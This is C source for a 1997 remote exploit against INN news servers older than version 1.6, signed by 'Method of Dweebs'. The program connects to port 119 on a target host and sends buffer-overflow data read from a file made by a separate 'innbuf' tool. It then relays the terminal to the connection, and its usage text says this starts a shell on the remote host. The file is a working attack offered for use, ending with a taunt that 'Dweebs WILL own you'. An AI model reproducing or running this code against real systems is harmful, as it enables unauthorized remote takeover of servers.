/*
 * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
 * To compile: cc nnrp.c -o nnrp. Usage: nnrp <host> <file generated by innbuf>.
 * (C) 1997 by Method of Dweebs <method@arena.cwnet.com>
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <limits.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>

#define POST            "POST\n"

#define SAY(a, b)       write(a, b, strlen(b))
#define CHOMP(a, b)     read(a, b, sizeof(b))
#define basename(a)     bname(a)

char *me;

make_addr(char *name, struct in_addr *addr)
{
        struct hostent *hp;

        if(inet_aton(name, addr) == 0) {
                if(!(hp = gethostbyname(name))) {
                        fprintf(stderr, "%s: ", me);
                        herror(name);
                        exit(1);
                }
                addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
        }
}

char *bname(char *str)
{
        char *cp;

        if((cp = (char *)strrchr(str, '/')) != NULL)
                return(++cp);
        else
                return(str);
}

void my_err(char *errstr, int err)
{
        fprintf(stderr, "%s: ", me);
        perror(errstr);
        exit(err);
}

void usage()
{
        printf(
                "INN version 1.[45].x exploit by Method <method@arena.cwnet.com>\n"
                "Usage: %s <host> <filename>\n"
                "Will start a shell on the remote host.\n"
                "The second argument is the file containing the overflow data.\n",
                me);
        exit(1);
}

select_loop(int netfd)
{
        int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
        char buf[512];
        fd_set rfds;

        for( ; ; ) {
                FD_ZERO(&rfds);
                FD_SET(in, &rfds);
                FD_SET(netfd, &rfds);

                if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0)
                        my_err("select", 1);

                if(!ret)
                        continue;

                if(FD_ISSET(in, &rfds)) {
                        if((n = read(in, buf, sizeof(buf))) > 0)
                                write(netfd, buf, n);
                }

                if(FD_ISSET(netfd, &rfds)) {
                        if((n = read(netfd, buf, sizeof(buf))) > 0)
                                write(out, buf, n);
                        else
                                break;
                }
        }
}

int news_sock(char *host)
{
        struct sockaddr_in sin;
        int sock;

        sin.sin_port = htons(119);
        sin.sin_family = AF_INET;
        make_addr(host, &(sin.sin_addr));

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                my_err("socket", 1);

        if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
                my_err("connect", 1);

        return(sock);
}

void send_egg(int sk, char *file)
{
        char buf[BUFSIZ];
        int dfd;
        int n;

        if((dfd = open(file, O_RDONLY)) < 0)
                my_err("open", 1);

        printf("Executing innd exploit.. be patient.\n");

        n = CHOMP(sk, buf);
        buf[n] = '\0';
        printf(buf);
        SAY(sk, POST);
        n = CHOMP(sk, buf);
        buf[n] = '\0';
        printf(buf);
        sleep(2);
        printf("Sending overflow data.\n");
        while((n = CHOMP(dfd, buf)) > 0)
                write(sk, buf, n);
        sleep(2);
}

void main(int argc, char **argv)
{
        char *victim, *filename;
        int s;

        me = basename(argv[0]);

        if(argc != 3)
                usage();

        filename = argv[2];

        send_egg(s = news_sock(victim = argv[1]), filename);

        select_loop(s);
        fprintf(stderr, "Connection closed.\n");
        printf("Remember: Security is futile. Dweebs WILL own you.\n");
        exit(0);
}